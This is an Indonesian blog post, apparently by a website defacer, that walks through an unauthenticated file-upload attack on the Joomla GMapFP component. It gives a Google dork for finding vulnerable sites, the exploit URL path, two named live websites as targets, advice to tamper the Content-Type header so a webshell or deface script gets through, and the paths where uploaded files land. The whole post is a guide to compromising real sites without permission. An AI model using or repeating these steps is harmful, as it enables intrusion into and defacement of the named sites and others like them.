Joomla Component GMapFP J3.5/J3.5F - Unauthenticated AFU
Hai Sobat
-
-
Kembali Lagi Saya Saya Admin Gans Wibu Kerajaan
--
Kali Ini Saya Bakal Share Pengetahuan Yg Tidak Begitu Penting Sih :v
Ya udahlah Langsung Aja Kuy?
Oke...
--
--
WASAPP .. Tadi Gw Coba Search" Di Google Dan Tanya" Keteman Saya..
DAN Saya Mendapatkan Exploit Buat Joomla
Oke Lah Langsung Ke Pembahasan Kuy?
--
Bahan :
Webshell : download sendiri
Google Dork : inurl:/index.php?option=com_gmapfp
Exploit : /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
1. Dorking
Dorking dengan dork diatas dan choose 1 target untuk dieksekusi. Disini saya memakai live target yah,
Live target :
https://bella-vista.com.gr/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
http://tuningrussia.org/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
2. Eksekusi
Lanjut jika sudah menentukan target,kita masukan exploitnya kedalam url. Dan jika ada form upload, maka bisa dikatakan vuln.
Upload file yang kalian inginkan kedalam server, namun disana terdapat sebuah filter yang hanya mengaccept file dengan Content-Type : image/jpeg atau yang lainnya. Jadi saya sarankan kalian coba melakukan tamper data untuk mengupload Webshell atau script deface kalian :D.
Dan untuk file aksesnya adalah :
http://target.com/images/stories/gmapfp/test.html.gif
http://target.com/images/gmapfp/test2.html.gif
http://target.com/images/gmapfp/test2.html.gif
Referensi : https://cxsecurity.com/issue/WLB-2020090037
Sekian dari saya, bila ada yang kurang atau salah kata, bodo amat xixixi
Assalamualaikum wr wb..
Komentar
Posting Komentar